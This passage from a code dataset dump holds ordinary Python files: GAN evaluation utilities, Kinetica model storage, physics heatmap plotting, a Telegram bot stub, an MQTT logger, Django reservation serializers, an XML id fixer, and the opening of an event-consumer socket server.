Data preprocessing\n ori_data = np.asarray(ori_data)\n generated_data = np.asarray(generated_data)\n\n ori_data = ori_data[idx]\n generated_data = generated_data[idx]\n\n no, seq_len, dim = ori_data.shape\n\n for i in range(anal_sample_no):\n if (i == 0):\n prep_data = np.reshape(np.mean(ori_data[0, :, :], 1), [1, seq_len])\n prep_data_hat = np.reshape(np.mean(generated_data[0, :, :], 1), [1, seq_len])\n else:\n prep_data = np.concatenate((prep_data,\n np.reshape(np.mean(ori_data[i, :, :], 1), [1, seq_len])))\n prep_data_hat = np.concatenate((prep_data_hat,\n np.reshape(np.mean(generated_data[i, :, :], 1), [1, seq_len])))\n\n # PCA Analysis\n pca = PCA(n_components=2)\n pca.fit(prep_data)\n pca_results = pca.transform(prep_data)\n pca_hat_results = pca.transform(prep_data_hat)\n\n real_std = pca_results.std(axis=0)\n fake_std = pca_hat_results.std(axis=0)\n print(\"Real std: \", real_std)\n print(\"Fake std: \", fake_std)\n if np.mean(real_std / fake_std) < 1.5:\n return False\n else:\n return True\n\n\ndef log_visualizations(dataset, genereted_data, run):\n \"\"\"Logging visualization results\"\"\"\n r = np.array([data[0].numpy() for data in dataset])\n f_pca = visualization(r, genereted_data, 'pca')\n run[\"PCA\"].upload(f_pca)\n plt.close(f_pca)\n\n f_tsne = visualization(r, genereted_data, 'tsne')\n run[\"tsne\"].upload(f_tsne)\n plt.close(f_tsne)\n\n f_umap = visualization(r, genereted_data, 'umap')\n run[\"umap\"].upload(f_umap)\n plt.close(f_umap)\n\n run[\"mode_collapse\"] = modeCollapseEvaluator(r, genereted_data)\n\n\ndef google_data_loading(seq_length):\n def MinMaxScaler(data):\n numerator = data - np.min(data, 0)\n denominator = np.max(data, 0) - np.min(data, 0)\n return numerator / (denominator + 1e-7)\n\n x = np.loadtxt('datasets/GOOGLE_BIG.csv', delimiter=\",\", skiprows=1)[::-1]\n # x = torch.tensor(x.copy())\n x = MinMaxScaler(x)\n\n # Build dataset\n dataX = []\n\n # Cut data by sequence length\n for i in range(0, len(x) - seq_length):\n _x = x[i:i + seq_length]\n dataX.append(_x)\n\n # Mix Data (to make it similar to i.i.d)\n idx = np.random.permutation(len(dataX))\n\n outputX = []\n for i in range(len(dataX)):\n outputX.append(dataX[idx[i]])\n\n return torch.tensor(outputX)\n\n\ndef restore_weights(model, run):\n run[\"model_checkpoint\"].download(destination=\"models/\")\n model.load_state_dict(torch.load(\"models/model_checkpoint.pt\", map_location=\"cpu\"))\n run.stop()\n return model\n\n\n","repo_name":"Kohmann/master-GAN","sub_path":"TimeGAN/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":12259,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"32"} +{"seq_id":"40096277107","text":"import gpudb\nimport os\nimport collections\n\nKDBC = gpudb.GPUdb(encoding='BINARY', host='127.0.0.1', port='9191')\n\nclass KModelIO(object):\n def __init__(self,h_db=KDBC):\n self.h_db=h_db\n self.file_type = \"\"\"\n {\n \"type\": \"record\",\n \"name\": \"file_type\",\n \"fields\": [\n {\"name\":\"model_binary\",\"type\":\"bytes\"},\n {\"name\":\"model\",\"type\":\"string\"},\n {\"name\":\"model_id\",\"type\":\"string\"},\n {\"name\":\"Accuracy\",\"type\":\"double\"},\n {\"name\":\"Data_Time_created\",\"type\":\"string\"}\n ]\n }\"\"\".replace('\\n', '').replace(' ', '')\n self.type_properties = {\"model_id\": [\"char64\"], \"Data_Time_created\": [\"datetime\"]}\n \n \n def Model2Kinetica(self,pbfile=None,sess=None,graph=None,output_node_names=None,ModelName=\"Model\",Loss=0.99, COLLECTION=\"Network\"):\n \"\"\"\n 
pbfile can be a path to a local file or a pickle bytes.\n \"\"\"\n import uuid\n from time import gmtime, strftime\n datetime = strftime(\"%Y-%m-%d %H:%M:%S\", gmtime())\n from tensorflow import graph_util\n h_db = self.h_db\n\n # create model table if not exist\n table = 'TFmodel'\n type_def=self.file_type\n if not h_db.has_table(table_name=table)['table_exists']:\n response = h_db.create_type(type_definition=type_def,\n label=table, properties=self.type_properties)\n h_db.create_table(table_name=table, type_id=response['type_id'],\n options={\"collection_name\": COLLECTION})\n\n # generate output binary string\n # output_node_names example,output_node_names = \"input,output,output2\"\n #print \"works 1\"\n if pbfile !=None:\n if len(pbfile)<256:\n model=open(pbfile,'rb').read()\n else:\n model=pbfile\n #print \"works 2\"\n else:\n output_graph_def = graph_util.convert_variables_to_constants(\n sess, # The session is used to retrieve the weights\n graph.as_graph_def(),\n output_node_names.split(\",\") # The output node names are used to select the usefull nodes\n )\n model=output_graph_def.SerializeToString()\n # insert model into kinetica\n encoded_obj_list = []\n ID = str(uuid.uuid1())\n datum = collections.OrderedDict()\n datum[\"model_binary\"] = model\n datum[\"model\"] = ModelName\n datum[\"model_id\"] = ID\n datum[\"Accuracy\"] = Loss\n datum[\"Data_Time_created\"] = datetime\n encoded_obj_list.append(h_db.encode_datum(self.file_type, datum))\n options = {'update_on_existing_pk': 'true'}\n response = h_db.insert_records(table_name=table, data=encoded_obj_list, list_encoding='binary', options=options)\n return ID\n \n\n def Model_from_Kinetica(self,Model_ID):\n from tensorflow import GraphDef,Graph,import_graph_def\n h_db = self.h_db\n response = h_db.get_records(table_name='TFmodel', encoding=\"binary\",\n options={'expression': \"model_id=\\\"\" + Model_ID + \"\\\"\"})\n records = gpudb.GPUdbRecord.decode_binary_data(response[\"type_schema\"], response[\"records_binary\"])\n record=records[0]\n record[\"model_binary\"]\n graph_def = GraphDef()\n graph_def.ParseFromString(record[\"model_binary\"])\n\n graph = Graph()\n with graph.as_default():\n # The name var will prefix every op/nodes in your graph\n # Since we load everything in a new graph, this is not needed\n import_graph_def(graph_def)\n return graph\n \n \n def SkModel_from_Kinetica(self,Model_ID):\n #from tensorflow import GraphDef,Graph,import_graph_def\n response = self.h_db.get_records(table_name='TFmodel', encoding=\"binary\",\n options={'expression': \"model_id=\\\"\" + Model_ID + \"\\\"\"})\n records = gpudb.GPUdbRecord.decode_binary_data(response[\"type_schema\"], response[\"records_binary\"])\n return records[0][\"model_binary\"]\n \n\n def getData(self, table='Mnist_train', offset=0, numberData=1):\n h_db=self.h_db\n response = h_db.get_records(table_name=table, offset=offset, limit=numberData)\n res_decoded = gpudb.GPUdbRecord.decode_binary_data(response[\"type_schema\"], response[\"records_binary\"])\n return res_decoded\n","repo_name":"kineticadb/kinetica-jupyterlab","sub_path":"notebooks/KJIO/kmodel_io.py","file_name":"kmodel_io.py","file_ext":"py","file_size_in_byte":4721,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"32"} +{"seq_id":"17963879780","text":"\"\"\"可视化计算的结果\"\"\"\n\n\nimport argparse\nimport numpy\nfrom helpers.drawer import draw_heatmap, draw_points\nfrom basics import Point\nfrom fermi.stripesquare import inverse_uval, set_stripe, 
set_potential\nfrom fermi.stripesquare import get_s_band_patches, get_p_band_patches\n\n\ndef draw_single_channel(args):\n    '''Draw the image result for a single channel'''\n    rpath = 'heatmap6/s{:.2f}nu{:.2f}'.format(args.stripe, args.dope)\n    uval = numpy.load('{0}/{1:.2f}U.npy'.format(rpath, args.lval))\n    #\n    c2i = {'s': [0], 'p': [1], '?': [0, 1]}\n    i2c = {0: 's', 1: 'p'}\n    candi = [c2i[bdi] for bdi in args.channel]\n    dims = [len(bdi) for bdi in candi]\n    place_holder = numpy.ndarray(dims)\n    ndit = numpy.nditer(place_holder, flags=['multi_index'])\n    while not ndit.finished:\n        idx1, idx2, idx3, idx4 = ndit.multi_index\n        bd1 = candi[0][idx1]\n        bd2 = candi[1][idx2]\n        bd3 = candi[2][idx3]\n        bd4 = candi[3][idx4]\n        print(bd1, bd2, bd3, bd4, '\\t', i2c[bd1], i2c[bd2], i2c[bd3], i2c[bd4])\n        draw_heatmap(\n            uval[bd1, bd2, bd3, bd4, :, :, args.n3idx],\n            save='show'\n        )\n        ndit.iternext()\n\n\ndef draw_mixed_channel(args):\n    '''Draw the result with the channels mixed together'''\n    rpath = 'heatmap6/s{:.2f}nu{:.2f}'.format(args.stripe, args.dope)\n    uval = numpy.load('{0}/{1:.2f}U.npy'.format(rpath, args.lval))\n    # sort the bands in counterclockwise order\n    shape = numpy.shape(uval)\n    bnum, pnum = shape[0], shape[4]\n    ppnum = pnum // 4\n    idxpairs = []\n    # s band, upper left\n    for idx in range(ppnum):\n        idxpairs.append((0, 3*ppnum + idx))\n    # p band, upper right\n    for idx in range(ppnum):\n        idxpairs.append((1, 2*ppnum + idx))\n    # p band, upper left\n    for idx in range(ppnum):\n        idxpairs.append((1, 3*ppnum + idx))\n    # s band, upper right\n    for idx in range(ppnum):\n        idxpairs.append((0, idx))\n    # s band, lower right\n    for idx in range(ppnum):\n        idxpairs.append((0, ppnum + idx))\n    # p band, lower left\n    for idx in range(ppnum):\n        idxpairs.append((1, idx))\n    # p band, lower right\n    for idx in range(ppnum):\n        idxpairs.append((1, ppnum + idx))\n    # s band, lower left\n    for idx in range(ppnum):\n        idxpairs.append((1, 2*ppnum + idx))\n    # assemble the image\n    #print(idxpairs)\n    totpnum = len(idxpairs)\n    heatmap = numpy.ndarray((totpnum, totpnum))\n    idx3pair = idxpairs[args.n3idx]\n    for chn in args.channel:\n        if chn == 's':\n            bd4 = 0\n        elif chn == 'p':\n            bd4 = 1\n        else:\n            raise ValueError('invalid bd4')\n        for hid1, pr1 in enumerate(idxpairs, 0):\n            for hid2, pr2 in enumerate(idxpairs, 0):\n                bd1, idx1 = pr1\n                bd2, idx2 = pr2\n                bd3, idx3 = idx3pair[0], idx3pair[1]\n                heatmap[hid1, hid2] = uval[bd1, bd2, bd3, bd4, idx1, idx2, idx3]\n    draw_heatmap(heatmap)\n\n\ndef draw_count_channel(args):\n    '''Draw the result with the channels mixed together'''\n    rpath = 'heatmap6/U2/s{:.2f}nu{:.2f}'.format(args.stripe, args.dope)\n    uval = numpy.load('{0}/{1:.2f}U.npy'.format(rpath, args.lval))\n    #uval2 = numpy.load('{0}/{1:.2f}U.npz'.format(rpath, args.lval))\n    #print(numpy.allclose(uval, uval2))\n    # sort the bands in counterclockwise order\n    shape = numpy.shape(uval)\n    bnum, pnum = shape[0], shape[4]\n    ppnum = pnum // 4\n    idxpairs = []\n    # s band, upper left\n    for idx in range(ppnum):\n        idxpairs.append((0, 3*ppnum + idx))\n    # p band, upper right\n    for idx in range(ppnum):\n        idxpairs.append((1, 2*ppnum + idx))\n    # p band, upper left\n    for idx in range(ppnum):\n        idxpairs.append((1, 3*ppnum + idx))\n    # s band, upper right\n    for idx in range(ppnum):\n        idxpairs.append((0, idx))\n    # s band, lower right\n    for idx in range(ppnum):\n        idxpairs.append((0, ppnum + idx))\n    # p band, lower left\n    for idx in range(ppnum):\n        idxpairs.append((1, idx))\n    # p band, lower right\n    for idx in range(ppnum):\n        idxpairs.append((1, ppnum + idx))\n    # s band, lower left\n    for idx in range(ppnum):\n        idxpairs.append((1, 2*ppnum + idx))\n    # assemble the image\n    #print(idxpairs)\n    totpnum = len(idxpairs)\n    heatmap = numpy.ndarray((totpnum, totpnum))\n    idx3pair = idxpairs[args.n3idx]\n    for chn in args.channel:\n        for hid1, pr1 in enumerate(idxpairs, 0):\n            for hid2, pr2 in enumerate(idxpairs, 0):\n                bd1, idx1 = pr1\n                bd2, idx2 = pr2\n                bd3, idx3 = idx3pair[0], idx3pair[1]\n                bdsum = bd1 + bd2 + bd3\n                # this case requires an even number of p\n                if chn == 'e':\n                    # if there is already an even number of p, add an s\n                    bd4 = 0 if bdsum % 2 == 0 else 1\n                # this case has an odd number of p\n                elif chn == 'o':\n                    # if there is already an even number of p, add a p\n                    bd4 = 1 if bdsum % 2 == 0 else 0\n                else:\n                    raise ValueError('invalid bd4')\n                heatmap[hid1, hid2] = uval[bd1, bd2, bd3, bd4, idx1, idx2, idx3]\n    draw_heatmap(heatmap)\n\n\ndef draw_basis_channel(args):\n    '''Display in the sublattice representation'''\n    rpath = 'heatmap6/s{:.2f}nu{:.2f}'.format(args.stripe, args.dope)\n    uval = numpy.load('{0}/{1:.2f}U.npy'.format(rpath, args.lval))\n    # find a few representative points in momentum space\n    upatches = numpy.ndarray(32, dtype=Point)\n    #anggap = numpy.pi / 2 / 8\n    #for idx in range(8):\n    #    tanv = numpy.tan((idx + 0.5)*anggap)\n    #    yval = numpy.pi * (tanv) / (1 + tanv)\n    #    xval = yval / tanv\n    #    upatches[idx] = Point(xval, yval, 1)\n    #    upatches[8 + idx] = Point(-yval, xval, 1)\n    #    upatches[16 + idx] = Point(-xval, -yval, 1)\n    #    upatches[24 + idx] = Point(xval, -yval, 1)\n    #draw_points(upatches)\n    set_stripe(0.)\n    set_potential(0.)\n    upatches[:16] = get_s_band_patches(16)\n    upatches[16:] = get_p_band_patches(16)\n    draw_points(upatches)\n    # stripe and potential were set to 0 above in order to obtain the corresponding points\n    # now set them back, because find_patch is needed later when transforming back\n    set_stripe(args.stripe)\n    set_potential(args.dope)\n    #\n    spats = get_s_band_patches(16)\n    ppats = get_p_band_patches(16)\n    ubas, iubas = inverse_uval(upatches, spats, ppats, uval)\n    #\n    draw_heatmap(ubas[0, 0, 0, 0, :, :, 4])\n    draw_heatmap(ubas[0, 1, 1, 0, :, :, 4])\n    draw_heatmap(ubas[1, 0, 0, 1, :, :, 4])\n    draw_heatmap(ubas[1, 1, 1, 1, :, :, 4])\n    #c2i = {'s': [0], 'p': [1], '?': [0, 1]}\n    #i2c = {0: 's', 1: 'p'}\n    #candi = [c2i[bdi] for bdi in args.channel]\n    #dims = [len(bdi) for bdi in candi]\n    #place_holder = numpy.ndarray(dims)\n    #ndit = numpy.nditer(place_holder, flags=['multi_index'])\n\ndef main():\n    '''Entry point'''\n    parser = argparse.ArgumentParser(\n        prog='python3 visualize.py',\n        description='visualize U'\n    )\n    parser.add_argument('-m', '--mode', type=str, required=True, help='drawing mode')\n    parser.add_argument('-s', '--stripe', type=float, required=True, help='stripe strength')\n    parser.add_argument('-d', '--dope', type=float, required=True, help='hole dope')\n    parser.add_argument('-l', '--lval', type=float, required=True, help='lval')\n    parser.add_argument('-c', '--channel', type=str, required=True, help='which band')\n    parser.add_argument('-n', '--n3idx', type=int, help='required if single mode')\n    parser.add_argument('--prefix', type=str,\\\n        default='scripts/stripe/str', help='saved file prefix')\n    args = parser.parse_args()\n    #\n    mode_dict = {\n        'single': draw_single_channel,\n        'mixed': draw_mixed_channel,\n        'count': draw_count_channel,\n        'basis': draw_basis_channel\n    }\n    mode_dict[args.mode](args)\n\n\nif __name__ == '__main__':\n    main()\n","repo_name":"maryprimary/frg","sub_path":"scripts/stripe/visualize.py","file_name":"visualize.py","file_ext":"py","file_size_in_byte":7745,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"5479982609","text":"# test waiting within \"async for\" __anext__ function\n\n# uPy allows normal generators to be awaitables.\n# CircuitPython does not.\n# In CircuitPython you need to have an __await__ method on an awaitable like in CPython;\n# and like in CPython, generators do not have __await__.\n\nclass Awaitable:\n    def __init__(self, x):\n        self.x = x\n\n    def __await__(self):\n        print('f start:', self.x)\n        yield self.x + 1\n        yield self.x + 2\n        return self.x + 3\n\nclass ARange:\n    def __init__(self, high):\n        print('init')\n        self.cur = 0\n        self.high = high\n\n    def __aiter__(self):\n        
print('aiter')\n        return self\n\n    async def __anext__(self):\n        print('anext')\n        print('f returned:', await Awaitable(20))\n        if self.cur < self.high:\n            val = self.cur\n            self.cur += 1\n            return val\n        else:\n            raise StopAsyncIteration\n\nasync def coro():\n    async for x in ARange(4):\n        print('x', x)\n\no = coro()\ntry:\n    while True:\n        print('coro yielded:', o.send(None))\nexcept StopIteration:\n    print('finished')\n","repo_name":"KMKfw/kmkpython","sub_path":"tests/basics/async_for2.py","file_name":"async_for2.py","file_ext":"py","file_size_in_byte":1116,"program_lang":"python","lang":"en","doc_type":"code","stars":20,"dataset":"github-code","pt":"32"} +{"seq_id":"1392446999","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat May 5 06:09:55 2018\n\n@author: User\n\"\"\"\nx=[1,2,3,4,5,6,7,8,9,0,1,2,3]\nstart=4\nprint(len(x))\nprint()\nend=12\nt=9\ndelta=end-start\nfor i in range(end,start-1,-1):\n    print (x[i],' ',i)\nfor w in range(0,5,1):\n    t-=1\n    print(t/100)","repo_name":"JeffHabe/PythonWorkspace","sub_path":"For LOOP.py","file_name":"For LOOP.py","file_ext":"py","file_size_in_byte":273,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"37511625580","text":"import telebot\nimport Compres\n\n\nbot = telebot.TeleBot(token)\n\n@bot.message_handler(commands=['start'])\ndef welcom(message):\n    send_mess = f' Hi {message.from_user.first_name}, how is it going?'\n    bot.send_message(message.chat.id, send_mess, parse_mode='html')\n@bot.message_handler(commands=['websait'])\ndef go_web(message):\n    marc = telebot.types.InlineKeyboardMarkup()\n    marc.add(telebot.types.InlineKeyboardButton('go to the website', url='https://www.youtube.com/watch?v=QoJ_yvPttlc'))\n    # marc.add(telebot.types.InlineKeyboardButton('no, I do not want to'))\n    send_message = f'Great, onward!'\n    bot.send_message(message.chat.id, send_message, parse_mode='html', reply_markup=marc)\n\n\n\n\n\n\n\n\n\n\n\n\n\nbot.polling(non_stop=True)\n","repo_name":"makaroch/semenar_py_dz","sub_path":"sem_9/main_2.py","file_name":"main_2.py","file_ext":"py","file_size_in_byte":787,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"73904030491","text":"\nimport json\n\nfrom paho.mqtt import client as mqtt_client\n\nimport bf_module.MQTT.common as MQTT\nimport bf_module.MQTT.config as CONFIG_MQTT\n\n\nTAG = \"[MQTT_DB_Service]\"\nclient_id = \"raspberry_bf\"\n\ndef on_message(client, userdata, msg:mqtt_client.MQTTMessage):\n    print(f\"[{msg.topic}] : {msg.payload.decode()}\")\n\n\n\ndef subscribe(client: mqtt_client.Client):\n    client.subscribe(CONFIG_MQTT.topic_all)\n    client.on_message = on_message\n\n    \n\ndef run():\n    client = MQTT.connect_mqtt(client_id)\n    subscribe(client)\n    client.loop_forever()\n\n\nif __name__ == '__main__':\n    print(f\"{TAG}:init\")\n    run()\n    print(f\"{TAG}:end\")","repo_name":"YecidMorenoUSP/BomFuturo_RBPI4","sub_path":"bf_module/Services/MQTT_LOG_service.py","file_name":"MQTT_LOG_service.py","file_ext":"py","file_size_in_byte":633,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"34568227576","text":"class Series:\n    \"\"\"\n    Class for a generic Series\n    \"\"\"\n    def __init__(self, data, series_type, name=None):\n        self.name = name\n        self.type = series_type\n        self.data = data\n\n    def __str__(self):\n        \"\"\"\n        String representation of a Series\n        \"\"\"\n        return '''\n        Series type: {}\n        Series name: {}\n        Series data: {}'''.format(type(self), self.name, str(self.data))\n\n    
def __eq__(self, other):\n \"\"\"\n Overwrites the equal operator \n Series types or lengths are different => fail hard\n Otherwise, element-wise comparison\n \"\"\"\n if self.type != other.type:\n raise TypeError('Series have different types: {} and {}'.format(self.type, other.type))\n elif len(self.data) != len(other.data):\n raise RuntimeError('Series have different lengths')\n else:\n return self.data == other.data\n","repo_name":"ruxi09/AlternativeDataFrame","sub_path":"generic_series.py","file_name":"generic_series.py","file_ext":"py","file_size_in_byte":821,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"29912375577","text":"\nimport re\ndef most_common_words(text, n):\n lst, d = re.findall(r\"\\b\\w+\\b\", text.lower()), dict()\n for w in lst:\n if w in d:\n d[w] += 1\n else:\n d[w] = 1\n lst_d = sorted([(k, v) for k, v in d.items()],\n key=lambda tpl: (-tpl[1], lst.index(tpl[0])))\n return {t[0]: t[1] for t in lst_d[:min(n, len(lst_d))]}\n\n","repo_name":"daniel-reich/ubiquitous-fiesta","sub_path":"5pYkwf948KBQ3pNwz_11.py","file_name":"5pYkwf948KBQ3pNwz_11.py","file_ext":"py","file_size_in_byte":372,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"36658944177","text":"import re\nimport os\nimport sys\nfrom typing import List\n\n\ndef repair_ids(text: str) -> str:\n # replace id's in tags with explicit xml:id value, if it starts with digit\n text = re.sub(r'<([a-zA-Z_][A-Za-z-_.]*?) ([^<^>]?xml:id=\")([0-9].*?\")', \"<\\g<1> \\g<2>\\g<1>\\g<3>\", text)\n\n # replace id's in text @corresp tags, if it starts with digit\n text = re.sub(r'(#p\\g<2>\", text)\n return text\n\n\ndef check_arguments(arguments: List[str]) -> None:\n if len(arguments) != 2:\n raise Exception(\"ERROR: Incorrect number of arguments.\")\n elif not type(arguments[1]) is str or not os.path.isdir(arguments[1]):\n raise TypeError(\"Expected directory path as command line argument.\")\n\n\ndef repair(source_dir: str) -> None:\n files = os.listdir(source_dir)\n\n for filename in files:\n if os.path.isfile(os.path.join(source_dir, filename)):\n source_text = load_text(source_dir, filename)\n if source_text:\n text_to_write = repair_ids(source_text)\n save_xml(text_to_write, filename, source_dir)\n\n\ndef load_text(directory: str, filename: str) -> str:\n file_path = os.path.join(directory, filename)\n text = \"\"\n try:\n with open(file_path) as file:\n text = file.read()\n except OSError:\n print(\"Couldn't open {} file.\".format(filename), file=sys.stderr)\n\n return text or None\n\n\ndef save_xml(text_to_write: str, filename: str, target_dir: str) -> None:\n # filename_to_write = filename + \"_id_corected\" + \".xml\"\n write_directory = os.path.abspath(os.path.join(target_dir, os.path.pardir, \"id_corrected\"))\n\n try:\n os.makedirs(write_directory)\n except FileExistsError:\n pass\n except PermissionError:\n raise PermissionError(\"Cannot create directory {}. 
Check permissions.\".format(write_directory))\n\n try:\n with open(os.path.join(write_directory, filename), 'w') as file:\n file.write(text_to_write)\n except OSError:\n print(\"Couldn't open {} file.\".format(filename), file=sys.stderr)\n\n\ndef main(argv: List[str]) -> None:\n check_arguments(argv)\n dir_to_repair = argv[1]\n repair(dir_to_repair)\n\n\nif __name__ == '__main__':\n main(sys.argv)\n","repo_name":"providedh/depositions-text-injection","sub_path":"src/depositions_text_injection/repair_wrong_xml_id.py","file_name":"repair_wrong_xml_id.py","file_ext":"py","file_size_in_byte":2247,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"28802812537","text":"from rest_framework import serializers\nfrom .models import Reserva\nfrom .models import Conductor\nfrom .models import Vehiculo\nfrom .models import Pasajero\nfrom .models import Ruta\nfrom .models import Grupo\nfrom .models import Viaje\nfrom datetime import datetime, timedelta, date\nfrom django.db.models import Sum\n\n\nclass VehiculoSerializer(serializers.ModelSerializer):\n class Meta:\n model = Vehiculo\n fields = '__all__'\n\nclass ConductorSerializer(serializers.ModelSerializer):\n class Meta:\n model = Conductor\n fields = '__all__'\n\nclass ReservaSerializer(serializers.ModelSerializer):\n class Meta:\n model = Reserva\n fields = '__all__'\n \nclass PasajeroSerializer(serializers.ModelSerializer):\n class Meta:\n model = Pasajero\n fields = '__all__'\n\nclass RutaSerializer(serializers.ModelSerializer):\n class Meta:\n model = Ruta\n fields = '__all__'\n\nclass GrupoSerializer(serializers.ModelSerializer):\n class Meta:\n model = Grupo\n fields = '__all__'\n\nclass ReservaSerializer(serializers.ModelSerializer):\n class Meta:\n model = Reserva\n fields = '__all__'\n \nclass ViajeSerializer(serializers.ModelSerializer):\n class Meta:\n model = Viaje\n fields = '__all__'\n \n\nclass ReservaCreateSerializer(serializers.Serializer):\n def to_representation(self, instance):\n # Este método controla cómo se representan los objetos de reserva en el JSON\n return {\n 'id': instance.id,\n 'DNI': instance.FK_Pasajero.DNI,\n 'NombreRuta': instance.FK_Viaje.FK_Ruta.Nombre,\n 'FechaReserva': instance.Fecha\n }\n \n DNI = serializers.IntegerField()\n NombreRuta = serializers.CharField()\n \n def validate(self, data):\n # verificar que el pasajero exista\n if not Pasajero.objects.filter(DNI=data['DNI']).exists():\n raise serializers.ValidationError(\"El pasajero no existe\")\n\n # buscar la ruta por nombre\n try:\n ruta = Ruta.objects.get(Nombre=data['NombreRuta'])\n except Ruta.DoesNotExist:\n raise serializers.ValidationError(\"La ruta especificada no existe\")\n \n # verificar que existe un viaje para la fecha del día siguiente\n try:\n viaje = Viaje.objects.get(FK_Ruta_id=ruta.id, FechaViaje__date=date.today() + timedelta(days=1))\n except Viaje.DoesNotExist:\n raise serializers.ValidationError(\"No hay un viaje programado para la ruta especificada el día siguiente\")\n \n # verificar que existe el grupo\n try:\n grupo = Grupo.objects.get(FK_Ruta=ruta.id)\n except Grupo.DoesNotExist:\n raise serializers.ValidationError(\"No existe Grupo\")\n \n # calcular la capacidad de la ruta\n capacidad_total = Vehiculo.objects.filter(grupo__FK_Ruta=grupo.id).aggregate(total_capacidad=Sum('Capacidad'))['total_capacidad']\n \n if Reserva.objects.filter(FK_Viaje_id=viaje.id).count() >= capacidad_total:\n raise serializers.ValidationError(\"La ruta está llena\")\n\n return data\n\n def 
create(self, validated_data):\n pasajero = Pasajero.objects.get(DNI=validated_data['DNI'])\n ruta = Ruta.objects.get(Nombre=validated_data['NombreRuta'])\n viaje = Viaje.objects.filter(FK_Ruta=ruta, FechaViaje__date=date.today() + timedelta(days=1)).first()\n\n reserva = Reserva.objects.create(FK_Viaje=viaje, FK_Pasajero=pasajero, Fecha=datetime.now())\n \n return reserva\n \n\n\n \n\n\n\n","repo_name":"secamc93/Reservaz","sub_path":"Backend/rz/app1/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":3640,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"21861455845","text":"#!/usr/bin python\n\nimport os\nimport errno\nfrom datetime import datetime\nfrom socket import error as sock_error\n\nfrom Server import Server\nfrom Event import Event\n\nclass EventConsumer(Server):\n\n\tdef __init__(self, config, buffSize=1024):\n\t\tServer.__init__(self, config[\"eventServer\"][\"ipAddress\"], \n\t\t\tconfig[\"eventServer\"][\"port\"], buffSize)\n\t\tself.dbConfig = config[\"dbSettings\"]\n\t\tself.running = True\n\t\tself.mediaDir = \"media/\"\n\t\tif not os.path.isdir(self.mediaDir):\n\t\t\tos.makedirs(self.mediaDir)\n\n\t\tprint(\"Event Consumer Server started...\")\n\t\t\n\n\tdef getACK(self, eType, seq = None):\n\t\tack = []\n\t\tack.append(3 << 6) # event ACK packet type\n\t\tack[0] = ack[0] | (eType << 4) # type of event acked\n\t\tack.extend([0 for _ in range(0,3)]) # add 3 bytes of padding\n\n\t\tif isinstance(seq, int):\n\t\t\tif seq <= 0xFFFFFFFF and seq >= 0:\n\t\t\t\tack.append(seq >> 24)\n\t\t\t\tack.append((seq & 0x00FF0000) >> 16)\n\t\t\t\tack.append((seq & 0x0000FF00) >> 8)\n\t\t\t\tack.append(seq & 0x000000FF)\n\t\t\telse:\n\t\t\t\tprint(\"Invalid sequence number %i\" % seq)\n\n\t\treturn bytes(ack)\n\n\n\tdef getHBResponse(self):\n\t\tresByte = 1 << 6 # heartbeat packet type\n\t\tresByte = resByte | (2 << 4) # response heartbeat type\n\n\t\tif self.running:\n\t\t\tresByte = resByte | 1 # 1 for alive\n\n\t\treturn bytes([resByte])\n\n\n\tdef getImageName(self):\n\t\tfilename = \"\"\n\t\tfor i in range(0, 10000):\n\t\t\tfilename = \"img%04d.jpg\" % i\n\t\t\tif not os.path.exists(self.mediaDir + filename):\n\t\t\t\tbreak\n\n\t\treturn filename\n\n\n\tdef consumeEvents(self):\n\t\twhile self.running:\n\t\t\tself.sock.listen(0)\n\t\t\tcSock, cAddr = self.sock.accept()\n\t\t\t#print(\"[Event Consumer] Accepted connection from %s.\" % str(cAddr))\n\t\t\tconnAlive = True\n\t\t\tevent = []\n\t\t\tpictureSize = None\n\t\t\tfilename = None\n\n\t\t\ttimeStarted = datetime.now();\n\t\t\ttry:\n\t\t\t\twhile connAlive:\n\t\t\t\t\tdata = cSock.recv(self.buffSize)\n\n\t\t\t\t\tevent.extend(data)\n\n\t\t\t\t\tif (event[0] >> 6) == 1: # heartbeat message\n\t\t\t\t\t\tconnAlive = False\n\n\t\t\t\t\tif (event[0] & 0x0F) == 0: # no picture (should be exactly 8 bytes)\n\t\t\t\t\t\tif len(event) >= 8:\n\t\t\t\t\t\t\tconnAlive = False\n\t\t\t\t\telif len(event) >= 12:\n\t\t\t\t\t\tpictureSize = event[8] << 24\n\t\t\t\t\t\tpictureSize = pictureSize | (event[9] << 16)\n\t\t\t\t\t\tpictureSize = pictureSize | (event[10] << 8)\n\t\t\t\t\t\tpictureSize = pictureSize | event[11]\n\n\t\t\t\t\t\tif len(event) >= pictureSize + 12:\n\t\t\t\t\t\t\tconnAlive = False\n\n\t\t\t\t# Organize event data\n\t\t\t\ttimeReceived = datetime.now()\n\t\t\t\tpacketType = event[0] >> 6\n\n\t\t\t\tif packetType == 1: # heartbeat\n\t\t\t\t\thbType = (event[0] & 0x30) >> 4;\n\t\t\t\t\thbMessage = event[0] & 0x0F;\n\n\t\t\t\t\t# Heartbeat Type: 
